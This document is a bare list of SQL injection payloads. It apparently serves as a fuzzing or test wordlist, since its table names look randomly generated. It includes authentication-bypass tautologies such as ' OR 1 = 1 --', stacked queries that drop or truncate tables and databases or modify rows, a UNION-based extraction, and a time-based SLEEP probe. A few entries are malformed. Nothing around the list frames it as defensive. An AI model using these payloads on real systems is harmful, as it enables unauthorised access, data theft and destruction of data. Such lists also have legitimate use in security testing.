1' OR 1 = 1 --
1" OR 1 = 1 --
 OR 1 = 1 --
1' OR 1 = 1
1" OR 1 = 1
1 OR 1 = 1
' OR 'a' = 'a
1" OR "a" = "a
') OR ('a' = 'a
1") OR ("a" = "a
1; DROP TABLE i; -- 
1; TRUNCATE TABLE n; --
1; SELECT f FROM n WHERE ln = i; --
1; SELECT IF (vm = j, 1, 0); --
1; INSERT INTO z (n) VALUES (e); --
1; UPDATE lpateb SET h = w WHERE i = jgnbs; --
1; DELETE FROM hp WHERE l = m; --
1; SELECT e FROM k WHERE es = pf UNION ALL SELECT bt FROM j WHERE b = b; --
1; CREATE DATABASE kjfa; --
1; DROP DATABASE zcf; --
1; SHOW DATABASES; --
1; CREATE TABLE q jzn VARCHAR\2\; --
'  ORDER BY t; --
1' OR SLEEP(39) --
